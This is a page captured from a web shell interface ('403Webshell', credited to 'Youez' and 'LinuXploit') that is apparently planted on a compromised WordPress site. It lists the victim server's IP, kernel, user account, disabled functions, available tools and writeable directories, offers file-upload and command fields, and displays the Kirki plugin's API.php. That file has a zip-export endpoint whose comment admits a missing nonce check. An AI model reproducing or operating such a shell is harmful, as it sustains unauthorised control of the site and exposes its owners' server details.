403Webshell
Server IP : 104.26.4.103  /  Your IP : 216.73.216.4
Web Server : nginx/1.27.1
System : Linux in-5 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
User : arabianexpress ( 1872)
PHP Version : 8.0.30
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /storage/v9321/leapdubai/public_html/wp-content/plugins/kirki/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /storage/v9321/leapdubai/public_html/wp-content/plugins/kirki/includes/API.php
<?php

/**
 * Register routes for Media and Frontend
 *
 * @package kirki
 */

namespace Kirki;

use Kirki\API\ContentManager\ContentManagerRest;

if (!defined('ABSPATH')) {
	exit; // Exit if accessed directly.
}

// use Kirki\API\ContentManager\ContentManagerRest; // Deprecated: routes now handled by Kirki\App\Http\Controllers\Api\CollectionController
use Kirki\API\KirkiComments\KirkiCommentsRest;
use Kirki\API\Media;
use Kirki\API\Frontend\FrontendApi;

/**
 * API Class
 */
class API
{



	/**
	 * Initialize the class
	 *
	 * @return void
	 */
	public function __construct()
	{
		add_action('rest_api_init', array($this, 'register_api'));
		add_action('init', array($this, 'download_zip_endpoint'));
	}

	/**
	 * Register_api
	 *
	 * @return void
	 */
	public function register_api()
	{
		// @todo: remove media from here
		// Media apis.
		// $media = new Media();
		// $media->register_routes();

		// @todo: remove them later
		// ContentManagerRest routes are now registered via routes/api.php
		// through the new framework (CollectionController + CollectionItemController).
		// $content_manager = new ContentManagerRest();
		// $content_manager->register_routes();

		// @todo: remove them later
		// $kirki_comments = new KirkiCommentsRest();
		// $kirki_comments->register_routes();

		FrontendApi::register();
	}

	public function download_zip_endpoint()
	{
		if (
			!isset($_GET['page-export'], $_GET['file-name']) ||
			'true' !== $_GET['page-export']
		) {
			return;
		}

		if (!HelperFunctions::has_access(KIRKI_ACCESS_LEVELS['FULL_ACCESS'])) {
			wp_send_json_error('Not authorized', 401);
		}

		// TODO: need to check nonce
		$this->downloadZIP();
	}

	private function downloadZIP()
	{
		$upload_dir = wp_upload_dir();
		$file_name = HelperFunctions::sanitize_text($_GET['file-name']);
		$file_name = basename($file_name);
		// Check if the file has a .zip extension
		if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'zip') {
			echo 'Invalid file type.';
			die();
		}
		$zipFilePath = $upload_dir['basedir'] . "/$file_name";
		// Send the zip file to the client.
		header('Content-Type: application/zip');
		header('Content-Disposition: attachment; filename="' . $file_name . '"');
		header('Content-Length: ' . filesize($zipFilePath));
		$this->output_file_and_cleanup($zipFilePath, $file_name);
		exit;
	}

	private function output_file_and_cleanup($path, $name)
	{
		global $wp_filesystem;
		if (empty($wp_filesystem)) {
			require_once ABSPATH . 'wp-admin/includes/file.php';
			WP_Filesystem();
		}

		if ($wp_filesystem->exists($path)) {
			echo $wp_filesystem->get_contents($path); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
			wp_delete_file($path);
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit